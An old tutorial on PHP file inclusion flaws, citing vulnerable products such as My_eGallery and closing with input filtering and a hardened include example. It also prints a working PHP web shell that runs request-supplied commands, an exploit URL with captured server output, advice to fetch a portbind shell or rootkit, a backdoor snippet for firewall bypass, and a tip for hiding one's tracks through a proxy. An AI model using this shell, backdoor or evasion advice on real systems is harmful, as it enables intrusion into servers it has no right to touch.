=====================================================
Topic: PHP file Inclusion.
Author: Rowter (rowter@vulnfact.com)
=====================================================
-
This text has the purpose of teaching how file inclusion works, so that
security managers and developers have a better approach when coding or using
open source apps, being careful with this particular aspect.
-
First of all, the most common functions in PHP for file inclusion
are include(), require(), require_once(), fopen(), readfile()
and virtual(). These functions accept local path names as well
as remote files given as URLs (remote files only when allow_url_fopen
is enabled).
Real Life Examples:
Product: My_eGallery
Versions affected: all <3.1.1.g
Website: http://lottasophie.sourceforge.net/index.php
CVS: http://cvs.sourceforge.net/viewcvs.py/lott...layCategory.php, revision 1.15,
committed Mon Jul 21 18:38:31 2003 UTC by jnapp
Lines 26-28:
include ("$basepath/public/imageFunctions.php");
include ("$basepath/includes/fileFunctions.php");
include ("$basepath/includes/treemenu.php");
Here the author builds the include path from the variable $basepath
without checking it first, a big mistake: with register_globals On,
a client can supply basepath in the request and point all three
includes at a file of their choosing, local or remote.
evilfile.txt, the file an attacker would point $basepath at, could be
as simple as:
<? passthru("$cmd"); ?>
or
This code has been seen in the wild:
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
Testing:
http://example.com/modules/My_eGallery/pub...uname%20-a%20;w
output:
uid=578(u1374) gid=584(u1374) groups=584(u1374) Linux server8.8.isreserved.com
2.4.20-24.7 #1 Mon Dec 1 13:35:11 EST 2003 i686 unknown sh: /usr/bin/w:
Permission denied PHP Warning: Failed opening '/fileFunctions.php' for inclusion
(include_path='.:/usr/share/php/PEAR') in
/home/sloki/user/u1374/sites/www/modules/My_eGallery/public/displayCategory.php
on line 3
Warning: Failed opening '/fileFunctions.php' for inclusion
(include_path='.:/usr/share/php/PEAR') in
/home/sloki/user/u1374/www/modules/My_eGallery/public/displayCategory.php
on line 3
Common things people do after a successful evil inclusion:
* wget a portbind shell: http://www.shellcode.com.ar/en/shellcodes.html
* execute a local exploit
* execute their favorite rootkit, bnc, etc. lame >(
Quick Solution:
if (isset($_REQUEST["basepath"])) { die("WTF?"); }
Important Security Matters to Remember:
=Magic_quotes_gpc On and register_globals Off
This is the best solution by far as it defuses in advance a lot of potential
security problems that originate from code injection or specification of
non-empty default values.
=Run PHP in Safe Mode
Safe Mode only permits modifications of files owned by the user that also owns
the executing script.
=Filter all input data that originates from the browser
The input data from the browser includes not only the data in the $_POST
array, but also the data in $_GET and $_COOKIE, as well as some data
in $_SERVER that is based on browser-supplied information.
That includes, among other things, the browser machine's IP address and
the URL that purportedly referred the browser to your script.
A few useful expressions:
A string that must only contain letters /^[^\W_\d]*$/
A non-empty string that must only contain letters /^[^\W_\d]+$/
A string that must only contain letters and that has to start with, evil /^evil[^\W_\d]*$/
A string that contains an e-mail address /^\w[\w\-\+\&\.]*@([A-Za-z][A-Za-z0-9\-]{0,23}\.)*[A-Za-z]{3}/
example:
<?php
$path = 'pages/';
$extension = '.php';
// with register_globals Off, read the page name explicitly from the request
$page = isset($_GET['page']) ? $_GET['page'] : '';
// allow only letters, digits and underscore: no "/", "..", ":" or null bytes
if ( is_string($page) && preg_match("#^[a-z0-9_]+$#i", $page) ){
    $filename = $path.$page.$extension;
    include($filename);
}
?>
This makes sure that only files from the directory $path with the file
extension $extension can be included: the pattern leaves no room for "../",
"/" or "http://" to reach include().
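Putting the quick solution and the allowlist together, as an added example
(not code from the original text or from My_eGallery): the script fixes the
base path itself so a request value can never reach include(), page names are
allowlisted before any filesystem call, and the resolved path is checked to
still lie under the page directory. The ./pages layout, PAGE_DIR and
safe_page_path() are this example's own assumptions.

```php
<?php
// Added example, not from the original text: a hardened version of the
// include($path.$page.$extension) pattern. Assumes pages live in ./pages
// next to this script; PAGE_DIR and safe_page_path() are names of this example.

// The script decides the base path itself, never the request: even with
// register_globals On, a client-supplied basepath= cannot reach include().
define('PAGE_DIR', dirname(__FILE__) . '/pages');
define('PAGE_EXT', '.php');

if (isset($_REQUEST['basepath'])) {
    die('basepath may not be supplied by the client');
}

// Return the absolute path of a page only if the name is safe, else null.
function safe_page_path($page)
{
    // 1. Allowlist the name before touching the filesystem: letters, digits
    //    and underscore only, so "../", "/", "http://", "php://" and null
    //    bytes are rejected outright. Non-strings (page[]=x) are rejected too.
    if (!is_string($page) || !preg_match('#^[a-z0-9_]{1,40}$#i', $page)) {
        return null;
    }
    // 2. Resolve the candidate and confirm it still lies under PAGE_DIR.
    //    realpath() returns false for a missing file, which also ends here.
    $base = realpath(PAGE_DIR);
    $full = realpath(PAGE_DIR . '/' . $page . PAGE_EXT);
    if ($base === false || $full === false) {
        return null;
    }
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // resolved elsewhere (e.g. via a symlink)
    }
    return $full;
}

$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$file = safe_page_path($page);

if ($file === null) {
    // Log the rejected value hex-encoded so attempts show up in log review.
    error_log('rejected page parameter: ' . bin2hex(print_r($page, true)));
    header('HTTP/1.0 404 Not Found');
    exit;
}
include $file;
```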
=Keep external functions to the absolutely necessary minimum
For most day-to-day tasks, PHP has customized functions available, which are
easily found in the PHP manual. The use of external functions for the same
purpose can only carry additional risk.
There are lots of other apps with the same problem:
Product: 2Gallery
Website: none, not opensource
<? if(empty($page)) $page="home"; include $page.".php"; ?>
Vulnerable systems:
* bes-cms version 0.4 rc3
* bes-cms version 0.5 rc3
http://www.securiteam.com/unixfocus/6S00L0K96S.html
Product : Advanced Poll
Version : 2.0.2
Textfile : http://security.opennet.ru/base/cgi/1067362687_1086.txt.html
Website : http://www.proxy2.de
Note: this can also work as a firewall bypass: if the attacker has access to
some web server, they can leave a badly coded PHP file there and later on
execute the portbinder with Apache's access.
something like:
if ($HTTP_GET_VARS[x0x]==1)
{include($evilxpage);}
And if you are worried about being traced when including a file, you could
always use your proxy friend, Google Translate:
http://translate.google.com/translate?u=www.whatismyip.com
Useful links:
http://php.ru.ac.za/manual/en/function.include.php